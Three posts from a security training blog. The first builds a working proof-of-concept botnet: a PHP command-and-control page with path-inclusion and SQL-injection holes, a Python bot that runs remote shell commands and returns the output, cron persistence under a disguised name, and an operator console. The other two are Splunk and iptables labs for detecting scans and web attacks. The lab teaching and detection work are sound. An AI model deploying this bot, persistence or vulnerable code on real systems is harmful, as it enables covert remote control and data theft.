Wednesday, November 29, 2017

Prepare, Bait, Hook, Execute and Control - Phishing

This post is one of four that I am planning to write about social engineering, specifically phishing.  The form of phishing I am going to talk about is where an email containing a link or an attachment is sent to a user; the email entices the user to click the link or open the attachment, which executes a payload and then provides control of the infected computer.

To explore this topic, I am going to go through the process backwards, starting with how control of the infected computer occurs as it becomes a bot.

I am going to use the zico2 virtual machine as if it were a web server on the internet.  My host will act as the controller of the bots through the web server, and I will simulate some infected computers that communicate with the web server.

1.  We are going to use PHPLiteAdmin to create a SQLite3 database called command.  Then create a table called botInfo with 6 fields, as shown below in the screenshot.

 
2.  Walking through the table: machineID is the unique identifier of the bot, osType is whether it is Linux or Windows, httpCommand is the command that is pending to be run on the bot, httpResults holds the results of the command, and executed indicates whether the httpCommand was executed.
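As a sketch, the same database and table could be created from Python's sqlite3 module instead of PHPLiteAdmin.  The id primary key and the TEXT column types are assumptions based on how the fields are described above.

```python
import sqlite3

# Create the "command" database with the botInfo table. On zico2 the path
# is /usr/databases/command; "command.db" here is just a local example.
conn = sqlite3.connect("command.db")
conn.execute("""
    CREATE TABLE IF NOT EXISTS botInfo (
        id          INTEGER PRIMARY KEY AUTOINCREMENT,  -- unique task identifier
        machineID   TEXT,  -- unique identifier of the bot
        osType      TEXT,  -- linux or windows
        httpCommand TEXT,  -- base64-encoded command pending execution
        httpResults TEXT,  -- base64-encoded results of the command
        executed    TEXT   -- whether the httpCommand was executed
    )
""")
conn.commit()
```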

3.  If you observe the permissions of the view.php file under /var/www, the zico account has access to modify the file.  You need to figure out how to log in with the zico account to continue with this exercise.


4. Through the previous walkthrough we identified that the www-data user is being utilized to run the website.  With the above permissions this user also has the ability to modify the website.

Challenge: Correct the permissions so that the pages will still load but www-data does not have permission to write to the www directory, its files, or any subdirectories.
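One possible approach to the permissions challenge, sketched in Python (Python 3 syntax; essentially a recursive chmod, with the ownership details on zico2 left to you):

```python
import os

def lock_down(webroot):
    # Directories stay traversable (r-x) so pages still load; files become
    # read-only, so the web server user can serve but not modify them.
    for root, dirs, files in os.walk(webroot):
        for d in dirs:
            os.chmod(os.path.join(root, d), 0o555)
        for f in files:
            os.chmod(os.path.join(root, f), 0o444)
    os.chmod(webroot, 0o555)

# lock_down("/var/www")  # run as root on the zico2 VM
```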


5.  Let's modify the view.php file to be used as the file for our command and control (C2) server.



Below is the code shown above, with the exception of the first and last lines.  You may need to reformat the code as you copy it out.


        if (isset($_GET['page'])) {
                $page = $_GET['page'];
                include("/var/www/" . $page);
        }
        elseif (isset($_GET['action'])) {
                $action = $_GET['action'];
                if ($action == 'getCommand') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=getCommand&mID=test
                        $machineID = $_GET['mID'];
                        $db = new SQLite3('/usr/databases/command');
                        $query = 'SELECT id, httpCommand FROM botInfo WHERE machineID="' . $machineID . '" AND executed="N" LIMIT 1';
                        $results = $db->query($query);
                        # count() does not work on a SQLite3Result, so track whether a row was fetched
                        $found = false;
                        while ($row = $results->fetchArray()) {
                                echo $row[0] . "|" . $row[1];
                                $found = true;
                        }
                        if (!$found) {
                                # Keep the id|command format so the bot can split on "|"
                                echo "0|" . base64_encode("Nothing");
                        }
                }
                elseif ($action == 'addBot') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=addBot&mID=test27
                        $machineID = $_GET['mID'];
                        $db = new SQLite3('/usr/databases/command');
                        $query = "INSERT INTO botInfo (machineID, httpCommand, executed) VALUES('" . $machineID . "','" . base64_encode('ls') . "','N')";
                        $results = $db->exec($query);
                        echo "Added";
                }
        }
        elseif (isset($_POST['action'])) {
                $action=$_POST['action'];
                if ($action=='postCommand') {
                        # Example to test with: curl -d "action=postCommand&mID=test&id=1&httpResults=test9" -X POST http://172.16.216.132/view.php
                        $machineID=$_POST['mID'];
                        $id=$_POST['id'];
                        $httpResults=$_POST['httpResults'];
                        $db = new SQLite3('/usr/databases/command');
                        $query = 'UPDATE botInfo SET httpResults="' . $httpResults . '", executed="Y" WHERE id=' . $id . ' AND machineID="' . $machineID . '"';
                        $results = $db->exec($query);
                        echo "Completed";
                }
        }
        else {
                echo "view.php?page=tools.html";
        }

6.  I will quickly step through the code above.  The page initially allows you to pass the page parameter with the tools.html file.  This could also be used to conduct directory traversal to access files throughout the file system that the www-data user can read.

We added logic so that if the action parameter with the value getCommand and an mID (machineID) are passed, we query the SQLite3 database for the first command that needs to be executed on the infected host, then return it as if it were the web page viewed in a web browser.  Remember that information passed as a GET parameter will, by default, show in the logs of the web server.

The other action is to add a new bot to the database.  This is used when a new computer infected with our proof-of-concept executable comes online.

The second section handles the POST parameter action with the value postCommand, which indicates the bot executed the given command and is returning the results through httpResults.  The page then responds that the action was "Completed".

7.  Well that was simple.  Let's move on.  We are now going to create the bot: proof-of-concept code that would run on an infected computer to control it.  I am going to utilize Python.

8. Below is the code for a python bot that will communicate with the PHP page called view.php. 




#!/usr/bin/python
# Building this bot to only work with linux
# Built for educational use only...

import base64
import hashlib
import random
import datetime
import urllib
import urllib2
import time
import subprocess

c2server="http://172.16.216.132/view.php"
sleepTime = 10 # Sleep for 10 seconds between requests going to the c2server

def generateMachineID():
 # This function generates a random machine ID based on the time and a random number
 machineID = str(datetime.datetime.now()) + str(random.randint(1,10000)) 
 machineID = hashlib.sha1(machineID).hexdigest() # Will return as machineID
 return machineID

def addBot(mID):
 # This function adds the bot to the C2Servers SQLite3 database
 url = c2server + "?action=addBot&mID=" + mID
 urllib2.urlopen(url).read()

def getCommand(mID):
 # This function gets the next command from the C2 to execute
 url = c2server + "?action=getCommand&mID=" + mID
 u = urllib2.urlopen(url)
 i = u.read()
 info = i.split("|")
 if len(info) < 2: # The server had no pending command; normalize the response
  return "0", base64.b64encode("Nothing")
 print "Received - Task ID: " + info[0] + "\tCommand: " + base64.b64decode(info[1])
 return info[0], info[1]

def execCommand(c):
 # This function takes the command it received and executes it
 c = base64.b64decode(c)
 comExec = subprocess.Popen(str(c), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
 STDOUT, STDERR = comExec.communicate()
 if STDOUT:
  encodedOutput = base64.b64encode(STDOUT)
 else:
  encodedOutput = base64.b64encode("Invalid Command...")
 return encodedOutput

def postCommand(mID, tID, r):
 # This function returns to the c2server the results of the command
 url = c2server
 data = urllib.urlencode({'action' : 'postCommand',
     'mID' : mID,
     'id' : tID,
     'httpResults' : r})
 u = urllib2.urlopen(url=url, data=data)

def main():
 machineID = generateMachineID() # Generate a random machine identifier
 addBot(machineID)  # Communicate to the C2 Server and Add this bot
 while True:   # Don't exit until program fails
  time.sleep(sleepTime) # Wait for the specified time 
  taskID, command = getCommand(machineID) 
  if base64.b64decode(command)=='Nothing':
   time.sleep(sleepTime*3)
  else:
   time.sleep(sleepTime)
   results = execCommand(command)
   time.sleep(sleepTime)
   postCommand(machineID, taskID, results)

if __name__ == "__main__":
 main()        

To talk through the code: it generates a unique machine ID, adds the bot machine ID to the database housed on the site, gets a command if one exists, executes the command, and then posts the results back to the site.

9.  The bot, if configured correctly, will persist on the system and be triggered to start or restart by a scheduled task or an action taken by the user.
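As a sketch of what that persistence might look like on Linux, a cron @reboot entry restarts the bot after every boot.  The bot path and the cron filename below are hypothetical, not taken from the exercise:

```python
# Hypothetical example: drop a cron entry so the bot starts at boot.
# Writing to /etc/cron.d requires root; the paths here are made up.
BOT_PATH = "/usr/local/bin/.bot.py"

def cron_persistence_line(bot_path=BOT_PATH):
    # @reboot fires once at startup; the bot's own while-loop keeps it running
    return "@reboot root /usr/bin/python " + bot_path + "\n"

def install(dest="/etc/cron.d/system-update"):
    with open(dest, "w") as f:
        f.write(cron_persistence_line())
```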

10.  Awesome, now we need an administration script to manage what commands we want the bots to execute, fetch the results, and remove completed tasks from the SQLite3 database to keep it cleaned out.  This will require us to add to the view.php page and build a new Python script to conduct the actions.

Below is the python script for the administration of the bots through view.php.




#!/usr/bin/python
# Building this utility to only work with linux
# Built for educational use only...

import base64
import urllib
import urllib2

c2server="http://172.16.216.132/view.php"
sleepTime = 10 # Sleep for 10 seconds between requests going to the c2server
log = open('log.txt','a')

def getExecuted():
 # This function gets the machine IDs that are in the database
 url = c2server + "?action=getExecuted"
 u = urllib2.urlopen(url)
 i = u.read()
 items = i.split('|')
 if items[1] == "Nothing":
  print "No commands executed to be return..."
  return "Nothing"
 else:
  print "Task ID: " + items[0] 
  print "Bot ID: " + items[1]
  print "$> " + base64.b64decode(items[2])
  print base64.b64decode(items[3])
  print
  # Record to a log file for future reference...
  log.write("BotID: " + items[1] + "\n")
  log.write("?> " + base64.b64decode(items[2]) + "\n")
  log.write(base64.b64decode(items[3]) + "\n\n")
  return items[1]
 
def selectBot(botList):
 count = 1
 for b in botList:
  print str(count) + ". " + b
  count=count+1
 print
 select = raw_input("> ");
 botNumber = int(select) - 1
 return botList[botNumber]

def sendCommand(b):
 command = raw_input("Command> ")
 # urllib.quote protects the "+" and "/" characters base64 can produce in a URL
 url = c2server + "?action=sendCommand&mID=" + b + "&httpCommand=" + urllib.quote(base64.b64encode(command))
 urllib2.urlopen(url).read()
 print
 print "Sent the command: " + command
 
def purgeOld():
 url = c2server + "?action=purge"
 urllib2.urlopen(url).read()
 print
 print "Sent command to purge old information."

def main():
 bots = []
 botSelected = 'None'
 while True:
  print
  print "C2 Server URL: " + c2server
  print "1. Get Executed Commands"
  print "2. Select Bot - Currently Selected: " + botSelected
  print "3. Send Command to Execute"
  print "9. Purge Old Commands"
  print "Q. Quit"
  print
  selection = raw_input("> ")
  if selection == "1":
   newBot = getExecuted()
   if newBot != "Nothing":
    if newBot not in bots: 
     bots.append(newBot)
     print "Added bot: " + newBot
  elif selection == "2":
   botSelected = selectBot(bots)
  elif selection == "3":
   sendCommand(botSelected)
  elif selection == "9":
   purgeOld()
  elif selection.lower() == "q":
   log.close()
   exit(0)

if __name__ == "__main__":
 main()        


To walk through the above code: you are presented with a menu.  If bots are running, you can retrieve the executed commands.  Each command is displayed and logged if available.  You can then select a bot and send commands back to the database to be executed.  You can also purge old commands.

11.  Now that we have a script to administer the bots, let's add the following 3 sections to the view.php file, underneath the addBot elseif.




                elseif ($action=='sendCommand') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=sendCommand&mID=test27&httpCommand=dddd
                        $machineID=$_GET['mID'];
                        $command=$_GET['httpCommand'];
                        $db = new SQLite3('/usr/databases/command');
                        $query = "INSERT INTO botInfo (machineID, httpCommand, executed) VALUES('" . $machineID . "','" . $command . "','N')";
                        $results = $db->exec($query);
                        echo "Added Command";
                }
                elseif ($action=='getExecuted') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=getExecuted
                        $db = new SQLite3('/usr/databases/command');    
                        $query = "SELECT count(*) FROM botInfo WHERE executed='Y' LIMIT 1";     
                        $results = $db->query($query);
                        while ($row = $results->fetchArray()) {
                                $rows = $row[0];                # Calculate the rows returned by the query
                        }
                        if ($rows > 0) {                        # If number of rows is greater than 0 then continue
                                $taskID = 0;
                                $query = "SELECT id, machineID, httpCommand, httpResults FROM botInfo WHERE executed='Y' LIMIT 1";
                                $results = $db->query($query);
                                while ($row = $results->fetchArray()) {
                                        echo $row[0] . "|" . $row[1] . "|" . $row[2] . "|" . $row[3];
                                        $taskID = $row[0];
                                }
                                $query = "UPDATE botInfo SET executed='D' WHERE id=" . $taskID;
                                $results = $db->exec($query);
                        }
                        else {
                                echo "Nothing|Nothing|Nothing|Nothing";
                        }
                }
                elseif ($action=='purge') {
                        # Example URL to Test: http://172.16.216.132/view.php?action=purge
                        $db = new SQLite3('/usr/databases/command');
                        $query = "DELETE FROM botInfo WHERE executed='D'";
                        $results = $db->exec($query);
                        echo "Purged";
                }       

To walk through the actions added to view.php: sendCommand is where the admin console sends in a command to be run by a specific bot, identified by machineID.

The getExecuted action is to gather and return commands that have been executed.

Then the purge action deletes the rows in the database that have been executed and returned to the admin console.

12.  Now let's test our proof-of-concept.  I am using my host to launch a program called "Terminator", which allows you to split the window into multiple terminal windows.  Below are screenshots of the admin console and 4 bots running on my host simulating a small botnet, along with what the SQLite3 database looks like.

The 4 bots communicating:


The admin console communicating with the 4 bots through the web page:


What the SQLite3 database looks like:


13.  Now that we can simulate a botnet let's see what it looks like in Splunk as the logs from the web server are read by the forwarder.

Challenge:  Setup the botnet with a simulation of 4 bots, the zico2 vulnerable web server and an admin console.

Challenge:  Setup the Splunk Forwarder to send the logs to a Splunk Server docker instance.  Study the logs and identify the bot activity.

14.  Understand that if a web site is compromised, a miscreant may change files.  This is where a file integrity monitoring (FIM) solution is helpful.  One of the many tools available is OSSEC.  You can set up OSSEC to record to a log file, and then the Splunk Forwarder can send the logs.

Challenge: Setup OSSEC to watch the /var/www directory for file changes.  Change view.php and then resave it and verify that the log detects it.

Challenge: Setup Splunk to receive the OSSEC logs.

The files that were created above can be pulled from my Github page located here.

Challenge: What is pivoting, as it is defined in penetration testing?

Challenge: If you had the access that the bot has, what would you look for to escalate privileges?

The goal of this post is for you to understand how a botnet may function, how a C2 server may function, and the tools and techniques that you can use to detect a bot or detect when a site has been compromised.

Friday, November 24, 2017

Docker with Splunk and Seattle 0.0.3 Walkthrough

For this post, I am going to quickly walk through the setup of Splunk using a docker image; refer to the previous post for detail on how to do this.  With Splunk configured, I am going to go back to the walk-through of Seattle 0.0.3, configure the logs to come in, and then step through the walk-through and see what logs are being generated.

The goals of this post are:
1.  To show how analysts could detect the attack occurring using a SIEM
2.  To show what the attack/walkthrough would look like in a SIEM
3.  To learn about additional tools that you can use to conduct or mitigate the attack.

Lab

1. In the previous post I walked through setting up a docker image called splunk/splunk and installing a Splunk Forwarder on the vulnerable image I was working with.  I am going to conduct the same with the Seattle 0.0.3 vulnhub VM.

2. My setup, quickly: a VM running Kali Linux (172.16.216.130) with docker running.  I am running the docker image for Splunk (172.17.0.2) on Kali.  The networking on the Kali VM is set up to be host-only.  From my Linux host I can reach the 172.16.216.130 VM.  I am going to use the host's IP address and NAT the ports I need for Splunk.  On the Kali VM I have SSH enabled and connect with the "-X" option to be able to X11 forward everything to my host.

Command on Kali to Start SSH: /etc/init.d/ssh start
Command on Host to Forward X11: ssh -X root@172.16.216.130

4.  Then I started the docker service and loaded the splunk image.

Command: service docker start
Command: docker run -it -p 172.16.216.130:8000:8000 -p 172.16.216.130:9997:9997 splunk/splunk

5.  Then I load the Seattle 0.0.3 VM (172.16.216.131) as a second VM.  Observe that this VM is 64-bit.  I need to transfer the Splunk Forwarder to this VM.  In the previous post I used secure copy over SSH.  In this post I am going to use a Python SimpleHTTP web server to host the files and then pull them from the Seattle VM.  I use this method to transfer or load files occasionally when I am working on vulnerable images.

First: Navigate to the directory where the files you need to host are located.  In the example below I have a folder called Splunk with the 32 and 64-bit Splunk forwarders.  Observe that this VM is built on Fedora 64-bit, so you need the rpm package of the Splunk Universal Forwarder.  The simple server will serve all of the files in the given directory.

Command: python -m SimpleHTTPServer
Note: You can follow the command with a specific port number.  By default it serves the files on port 8000.



6.  Pull the file that you need onto the Seattle 0.0.3 virtual machine using bash, assuming you have root on the Seattle VM through SSH.  I built a script in bash to demonstrate using native bash commands to download the file.  You can really simplify the script if you need to...
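If Python happens to be available on the target, a standard-library pull is another option.  This is a sketch in Python 3's urllib.request (the post's bot code uses the Python 2 urllib2 equivalents), and the URL and filename in the commented call are examples:

```python
from urllib.request import urlopen

def download(url, dest):
    # Fetch the file over HTTP and write it to disk, no wget or curl required
    with urlopen(url) as resp, open(dest, "wb") as out:
        out.write(resp.read())

# download("http://172.16.216.130:8000/splunkforwarder.rpm", "sf.rpm")
```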

Challenge: Create the script, change permissions, execute it, and download the Splunk Universal Forwarder for Fedora/Red Hat.


7.  The VM is configured for a GB keyboard layout.  You can change this by modifying the 2 files listed below; however, as an attacker, if you do make the change, make sure you change it back.  I often find that attackers do a fair job of cleaning up but often miss the small things that they change.  Google how to change the keyboard layout in Fedora as part of the challenge.

/etc/locale.conf
/etc/vconsole.conf

8. Install the Splunk Universal Forwarder.

Command: rpm -ivh sf.rpm


9.  After Splunk is installed setup the forwarding server to the Splunk docker image on the Kali VM (172.16.216.130) that has the ports NATed.

10.  Enable logging for queries in the MariaDB server that is running.



11.  Then restart the service in Fedora for the mariadb server.

Command:  systemctl restart mariadb.service

12.  Now add the following files so that the Splunk Universal Forwarder can send them to the Splunk server running on the Kali VM.

/var/log/mariadb/error.log
/var/log/mariadb/query.log
/var/log/httpd/access_log

13.  Before we move on, let's work with the iptables firewall that is running to generate logs of the activity.  On this VM in the /root home directory is a script called "shieldsup.sh".  We are going to copy and then modify that script to keep it simple.

Command: cp shieldsup.sh v2.sh



14.  Modify the v2.sh file, adding logging to the script that configures the iptables firewall.  Below is how I modified it.  The firewall script could be simplified both by consolidating the logging policies and by using bash for loops.


15.  The logs for the firewall will show up inside the file /var/log/messages.  Below is a screenshot of what you would see if you were to capture a few of them.


16.  Setup the Splunk Universal Forwarder to also read and send these logs to the Splunk server: /var/log/messages.  Below is a screenshot of the monitors I have enabled for the Seattle 0.0.3 VM.


17.  Run a nmap scan on the Seattle VM to verify you are receiving logs.  Also verify the script you wrote for the firewall logging is executed.

18.  Verify in Splunk that you are receiving the iptables, httpd and mysql logs.


19.  Now going to the walkthrough, let's start by scanning with netcat.


20.  Use the Splunk Search like you would conduct a google search.  Run the following search:

Search: index=main DPT=76

Search the main index of Splunk for the string DPT=76 amongst the logs.  DPT is an abbreviation of destination port.  You should see results similar to what is below.  In step 19 we scanned destination port 76.
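Outside of Splunk, the same DPT field can be pulled from the raw log lines with a few lines of Python (Python 3 here).  The sample line below is illustrative of the typical iptables LOG format, not an exact entry from the VM:

```python
import re

# A line shaped like the iptables LOG output that lands in /var/log/messages
line = ("Nov 29 10:00:00 seattle kernel: LOG-DROP-INPUT IN=ens33 OUT= "
        "SRC=172.16.216.1 DST=172.16.216.131 PROTO=TCP SPT=51514 DPT=76")

m = re.search(r"SRC=(\S+).*\bDPT=(\d+)", line)
if m:
    # src is the scanning host, dport the destination port Splunk matches on
    src, dport = m.group(1), int(m.group(2))
```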


21.  You can also use conditional statements in your searches.  For example, if I wanted to see the logs generated by scans going to destination ports 76 and 77:

Search: index=main (DPT=76 OR DPT=77)



22.  Now we are going to request the home page of the web site using netcat.

Command: nc 172.16.216.131 80
String: GET / HTTP/1.0

23.  Looking in Splunk, we see the following logs after searching specifically for the log source of /var/log/httpd/access_log.

Search: index=main source="/var/log/httpd/access_log"


 
Looking closer at the log, where the user-agent normally appears you see a "-".  If you have a web application firewall or another method to filter on a blank user-agent, you could block this scan.  (The Apache web server has filtering capabilities that could be utilized also.)
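A quick way to see the idea, sketched in Python against Apache's combined log format (the sample entries are illustrative, not copied from the VM):

```python
import re

# Flag access_log entries whose user-agent field is "-" (blank), like the raw
# netcat request above; the user-agent is the last quoted field on the line.
logs = [
    '172.16.216.1 - - [29/Nov/2017:10:00:00 -0500] "GET / HTTP/1.0" 200 3525 "-" "-"',
    '172.16.216.1 - - [29/Nov/2017:10:00:05 -0500] "GET / HTTP/1.1" 200 3525 "-" "Mozilla/5.0"',
]

def blank_agent(line):
    fields = re.findall(r'"([^"]*)"', line)
    return bool(fields) and fields[-1] == "-"

flagged = [l for l in logs if blank_agent(l)]
```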

24.  Now we are going to use OWASP DirBuster and hit the home page.  Observe that each hit records a log entry.  Also, in the user-agent you can see we are utilizing OWASP DirBuster.


Challenge: Identify how to change the user-agent in dirbuster.

25.  Let's configure iptables to observe the new connections coming into the firewall on port 80.  If a connection is NEW and hits the firewall 5 times within 120 seconds, then log and drop the connection.

Change the firewall script on the Seattle 0.0.3 VM and set it.  Pay particular attention to how the LOG-ACCEPT-INPUT-NEW policies are created.  I copied the previous firewall script to a new one, so if I had to I could revert to it.

Note:  If you make changes to the firewall script, you need to run ./shieldsdown.sh and then ./v3.sh to reset the counters maintained by iptables that determine whether an IP address should be blocked.
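The rate-limit behavior described above maps onto iptables' recent module.  Below is a sketch of what the rule pair might look like, printed from Python; the match name and log prefix are assumptions based on the LOG-ACCEPT-INPUT-NEW naming, not the exact rules from my script:

```python
# Hypothetical rules: track NEW connections to port 80, and once a source
# has hit 5 times within 120 seconds, log and drop further NEW attempts.
rules = [
    "iptables -A INPUT -p tcp --dport 80 -m state --state NEW "
    "-m recent --set --name HTTP80",
    "iptables -A INPUT -p tcp --dport 80 -m state --state NEW "
    "-m recent --update --seconds 120 --hitcount 5 --name HTTP80 "
    "-j LOG --log-prefix 'LOG-DROP-INPUT '",
    "iptables -A INPUT -p tcp --dport 80 -m state --state NEW "
    "-m recent --update --seconds 120 --hitcount 5 --name HTTP80 -j DROP",
]
for rule in rules:
    print(rule)  # run these on the Seattle VM as root
```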



26.  If the firewall is setup and functioning correctly, you should see that DirBuster observed multiple timeouts while it was scanning, due to being blocked.  DirBuster will now pause and wait.


27.  If you search in Splunk you will see the behavior of the connection change from LOG ACCEPT INPUT NEW to LOG DROP INPUT.

Search: index=main DPT=80


28.  Let's look specifically at the Splunk logs for /var/log/httpd/access_log.  I modified DirBuster to use a unique user-agent.  Notice the search returns only the scan, 303 logs versus a potential of thousands of logs.  Also, in the search I specified the log source and a string to search for that would be unique in the logs.

Search: index=main source="/var/log/httpd/access_log" "DirBuster-1.0-RC1-iptables-test2"


Being able to search using an attacker's IP address, a unique user-agent, or other information you can find that is unique about an attack is worth gold in finding an attacker and what they have done.  You can also associate multiple IP addresses with an attack that is occurring.

On the attackers side, you should try and stay hidden.  Learn how to decrease the amount of generated traffic and learn how to fit in with existing traffic.  I have heard this called "flying beneath the radar" or trying not to draw attention to yourself.

29.  The next step in attacking the Seattle 0.0.3 VM was to fuzz the password of the user. 

Challenge:  Fuzz the password for the admin user and observe if the iptables rules that we put in-place above will mitigate this attack also.

30.  The next item was to create stored XSS in a post to the blog after you log in as admin. 

Challenge:  Create a search in Splunk to identify XSS by searching for the keyword script or alert.











Monday, November 20, 2017

Docker with Splunk and Billu B0x forwarding Apache2 and mysql logs

For this post, I am going to walk through the setup of Splunk using a docker image.  With Splunk configured I am going to go back to the walk-through of Billu b0x, configure the logs to come in, and then we are going to go through the walk through and see what logs are being generated.

The goals of this post are:
1.  To show how analysts could detect the attack occurring using a SIEM
2.  To show what the attack/walkthrough would look like in a SIEM
3.  To learn what you could change in the attack/walkthough to be more stealthy in the methods utilized and how tools are used

Lab

1.  On my Kali box where docker is installed, start the service.

Command: service docker start

2.  Then search for docker images for the keyword "splunk"

Command: docker search splunk

3.  The image that I selected is called splunk/splunk.  So I am going to pull down that image.  We are trying to get version 7 of splunk.

Command: docker pull splunk/splunk

4.  After pulling the image we are going to run it.  However, prior to doing that, note that Splunk uses port 8000 for the web interface and also needs port 9997 for a splunk forwarder (agent) to send logs to the server.  (The ports can be changed.)  With the docker image installed on Kali, the image will receive by default a 172.17.0.2 IP address.  Billu_b0x will be in a virtual machine that will not have access to that IP address unless we associate the ports with the IP address of Kali.  To do that, use the -p command line switch to indicate the IP address you want to bind to and the listening port on that IP address, forwarded to the port on the image.

Command: docker run -it -p 172.16.216.130:8000:8000 -p 172.16.216.130:9997:9997 splunk/splunk


5.  When the image loads it will have you agree to the End-User License Agreement.  After it completes loading it will display a blinking cursor.  Use the key combination Ctrl-p Ctrl-q to detach from the image while leaving it running.

6.  Because we associated the Splunk web interface with an IP address that the host of my Kali VM can reach, let's navigate to the Splunk login page on port 8000.  (You should change the password, but remember that, being a docker image, you will lose everything when you kill the instance of the image.)

URL: http://172.16.216.130:8000



7.  Then setup a receiver to listen on port 9997.  Click settings in the top right, then select forwarding and receiving.  Then click add new to receive data.  Insert port 9997 for the default port.



8.  Now, we need to load the Billu_b0x VM.  If you do not know the root password, go back and work through the VM and figure out the password.  Go ahead and login to the console and start the SSH server.

Command: /etc/init.d/ssh start

9.  Connect to the VM from the host through SSH.  This will simplify the configuration.

Command: ssh root@172.16.216.129

10.  Download the "Universal Splunk Forwarder" to the host.  This VM requires the 32-bit deb package.  After you download the file, named similar to splunkforwarder-7.0.0-c8a78efdd40f-linux-2.6-intel.deb, copy it over to the Billu_b0x VM.

11. In a new terminal window, let's copy the file over to the VM.  To do this you can use WinSCP on windows or scp on Linux.  I am going to demonstrate using scp. 

Command:  scp splunkforwarder-7.0.0-c8a78efdd40f-linux-2.6-intel.deb root@172.16.216.129:/root

Walking through the command: secure copy the file using the root account to the IP address listed and place the file in the /root directory.

12.  Then go back to the SSH session you established in step 9 and install the splunk forwarder.

Command:  dpkg -i splunkforwarder-7.0.0-c8a78efdd40f-linux-2.6-intel.deb

13.  Now that the forwarder is installed, we need to configure it to send logs to 172.16.216.130:9997, the Kali box on port 9997, which then sends them to the docker image of splunk.

Command: /opt/splunkforwarder/bin/splunk add forward-server 172.16.216.130:9997


14. Verify the forward-server is configured.

Command: /opt/splunkforwarder/bin/splunk list forward-server

You should see it listed under inactive forwarders.  Don't worry about this yet.

15.  Now you need to add which files or directories you would like to send to Splunk.  The main reason you want to send your logs to a SIEM or central location is that a miscreant may tamper with them or delete them on the box.

16.  Let's add the logs for the apache2 server for the access.log and the error.log.

Command:  /opt/splunkforwarder/bin/splunk add monitor /var/log/apache2/access.log

Command: /opt/splunkforwarder/bin/splunk add monitor /var/log/apache2/error.log



17.  Now that we have configured the forwarder to send logs to the server and what logs to send to the server, let's start the splunk forwarder.

Command:  /opt/splunkforwarder/bin/splunk start splunkd


18.  After this is started you may have to wait about 2-5 minutes but then navigate in Splunk to the search box.  In the search query, type index=main and search for the last 24 hours.  You should see the logs.

19.  To generate some logs I created a simple script to get the home page of Billu_b0x every tenth of a second, up to 2000 times.  I ran the script from the host.
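The script itself isn't shown, but the loop can be sketched in Python 3.  The fetch callable is parameterized so the pacing logic stands on its own; the commented call shows hitting the Billu_b0x home page:

```python
import time

def hammer(fetch, count=2000, delay=0.1):
    # Call fetch() up to count times, sleeping delay seconds between requests
    hits = 0
    for _ in range(count):
        try:
            fetch()
            hits += 1
        except Exception:
            pass  # keep going even if a single request fails
        time.sleep(delay)
    return hits

# from urllib.request import urlopen
# hammer(lambda: urlopen("http://172.16.216.129/").read())
```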



20.  If all is setup correctly, click splunk in the top-left, click app search and reporting, then in the new search insert "index=main".  You should see the logs coming in, indicating the host is "indishell".


21.  Notice that the wget tool will identify itself in what is called the user-agent.  The user-agent will describe the tool, browser, operating system and other plugins associated with the connecting device to a web server.

22.  With the tool wget you can control the user-agent that is passed.  In the terminal window I specified the user-agent to be "Hello!" and then executed it.  I searched the logs and found the log entry that I caused with the tool.
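The same control exists in Python's urllib, shown here with Python 3's urllib.request (wget takes the agent on the command line with --user-agent):

```python
from urllib.request import Request

# Build a request carrying a custom user-agent, the same idea as
# wget --user-agent="Hello!"
req = Request("http://172.16.216.129/", headers={"User-Agent": "Hello!"})
# urllib.request.urlopen(req).read()  # would send the GET with the custom agent

print(req.get_header("User-agent"))
```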


23.  As a penetration tester you should understand what your tools look like in the logs.  As defenders you should know about what these tools produce and should look through logs for anomalies or unique user-agents to detect interesting activity.

24.  In the Billu b0x walk through we used nikto and dirb.  Below I am going to run both tools and we are going to look at the logs to see what is produced from the tools.

Command: nikto -h 172.16.216.129
Command: dirb http://172.16.216.129 /usr/share/wordlists/dirb/big.txt 


Before... 2,002 logs recorded


After nikto... 18,414 logs recorded (Observe the user-agent)



After dirb... 89,683 logs recorded (Observe the user-agent)



Challenge: Can you change the user-agent that is passed with nikto or dirb?

Challenge: Use Splunk to search the logs.  Try to find HTTP 200 responses, i.e. pages that exist, that nikto or dirb accessed.

25.  Now we are going to set up MySQL to log queries to a file and configure the Splunk forwarder to collect those logs.  Log in as root to Billu b0x, change to /etc/mysql and modify the my.cnf file.

Command: cd /etc/mysql
Command: vim my.cnf


26.  Scroll down in the file to the "Logging and Replication" section.  Remove the comment character "#" in front of "general_log_file" and "general_log".  Then save and exit from vim ("<esc> :wq").
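After uncommenting, the relevant lines in my.cnf look like the following (exact spacing varies by MySQL version).  Note that MySQL must be restarted (Command: service mysql restart) for the change to take effect.

```ini
# /etc/mysql/my.cnf -- "Logging and Replication" section, uncommented
general_log_file = /var/log/mysql/mysql.log
general_log      = 1
```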


27.  Now add the file "/var/log/mysql/mysql.log" to the splunk files to be monitored, also add the error.log.

Command: /opt/splunkforwarder/bin/splunk add monitor /var/log/mysql/mysql.log

Command: /opt/splunkforwarder/bin/splunk add monitor /var/log/mysql/error.log



28.  After configuring MySQL logging, attempt to log in, then use Splunk to view the query that carries the username and password to the database.  Notice the search is restricted to the mysqld sourcetype.

Search: index=main sourcetype=mysqld


29.  The query is logged, and the user's username and password are now in the logs.  Working with a SIEM you need to understand what ends up in the logs.  Other examples are queries containing an SSN or a credit card number.  Be aware of when this kind of information could be gathered by a SIEM.

Developers need to be careful both about returning sensitive information in results and about querying for it directly.  For example, you can query for the stored password of the user, then compare the user's input against the returned password server-side and verify they match, after first checking that the user exists in the database.
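A sketch of that server-side check using a parameterized query.  The sqlite3 database, table layout, and MD5 hashing (matching this lab's setup) are assumptions for illustration:

```python
import hashlib
import hmac
import sqlite3

def verify_login(conn, email, password):
    """Look up the stored hash with a parameterized query, then compare
    server-side instead of embedding the user's password in the SQL."""
    row = conn.execute(
        "SELECT password FROM Users WHERE email = ?", (email,)
    ).fetchone()
    if row is None:
        return False  # verify the user exists before comparing anything
    supplied = hashlib.md5(password.encode()).hexdigest()  # MD5 assumed, as in this lab
    return hmac.compare_digest(row[0], supplied)
```

Because the query takes user input only as a bound parameter, the substr() injection used in this walkthrough no longer works against it.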

30.  As an ethical hacker or penetration tester you may want to test your attack in a lab prior to performing it.  I also like to test for vulnerabilities with a proxy and logging enabled.  This helps me analyze my attacks and see how I need to change them to be more effective.

Challenge:  Continue working through the Billu b0x walkthrough.  Use Burp Suite and see if you can tell from the logs that you are using it as a proxy.




Wednesday, November 15, 2017

